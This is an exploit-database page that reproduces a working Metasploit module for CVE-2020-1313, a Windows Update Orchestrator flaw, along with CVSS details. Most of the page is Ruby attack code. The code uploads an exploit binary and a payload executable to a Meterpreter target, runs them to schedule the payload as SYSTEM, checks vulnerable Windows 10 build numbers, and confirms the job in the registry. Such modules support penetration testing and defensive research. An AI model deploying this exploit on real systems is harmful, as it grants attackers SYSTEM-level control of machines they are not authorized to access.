Microsoft Windows Update Orchestrator Unchecked ScheduleWork Call

2020.09.29
Credit: Imre Rad
Risk: High
Local: No
Remote: Yes
CWE: CWE-269


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/exploit/exe' require 'msf/core/post/windows/registry' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Update Orchestrator unchecked ScheduleWork call', 'Description' => %q{ This exploit uses access to the UniversalOrchestrator ScheduleWork API call which does not verify the caller's token before scheduling a job to be run as SYSTEM. You cannot schedule something in a given time, so the payload will execute as system sometime in the next 24 hours. }, 'License' => MSF_LICENSE, 'Author' => [ 'Imre Rad', # Original discovery? and PoC (https://github.com/irsl/CVE-2020-1313) 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ ['Windows x64', { 'Arch' => ARCH_X64 }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2019', 'References' => [ ['CVE', '2020-1313'], ['URL', 'https://github.com/irsl/CVE-2020-1313'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => true } ) ) register_options([ OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('WRITABLE_DIR', [false, 'Path to write binaries (%TEMP% by default).', nil]), OptInt.new('EXPLOIT_TIMEOUT', [true, 'The number of seconds to wait for exploit to finish running', 60]), OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3]) ]) end def exploit exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14) payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe') payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe') temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP') payload_path = "#{temp_path}\\#{payload_name}" exploit_path = "#{temp_path}\\#{exploit_name}" payload_exe = generate_payload_exe # Check target vprint_status('Checking Target') validate_active_host validate_target fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path) # Upload Exploit vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}") ensure_clean_destination(exploit_path) exploit_bin = exploit_data('cve-2020-1313', 'cve-2020-1313-exe.x64.exe') write_file(exploit_path, exploit_bin) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") # Upload Payload vprint_status("Uploading Payload to #{sysinfo['Computer']} as #{exploit_path}") ensure_clean_destination(payload_path) write_file(payload_path, payload_exe) print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") print_warning("This exploit requires manual cleanup of the payload #{payload_path}") # Run Exploit vprint_status('Running Exploit') begin output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60) vprint_status("Exploit Output:\n#{output}") rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end vprint_status("Cleaning up #{exploit_path}") ensure_clean_destination(exploit_path) # Check registry value unless registry_key_exist?('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler') fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') end reg_keys = registry_enumkeys('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler') fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') if reg_keys.nil? found_job = false reg_keys.each do |key| start_arg = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'startArg') next unless start_arg['Data'].include? payload_name found_job = true queued_time = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'queuedTime') q_time_i = queued_time['Data'].unpack1('L_') q_time_t = (q_time_i / 10000000) - 11644473600 print_good("Payload Scheduled for execution at #{Time.at(q_time_t)}") end fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') unless found_job end def validate_active_host print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog('Could not connect to session', error: e) raise Msf::Exploit::Failed, 'Could not connect to session' end def validate_target if sysinfo['Architecture'] == ARCH_X86 fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end end def check sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") if sysinfo_value =~ /10/ && (17763 < build_num) && (build_num <= 19041) return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def ensure_clean_destination(path) return unless file?(path) print_status("#{path} already exists on the target. Deleting...") begin file_rm(path) print_status("Deleted #{path}") rescue Rex::Post::Meterpreter::RequestError => e elog(e) print_error("Unable to delete #{path}") end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top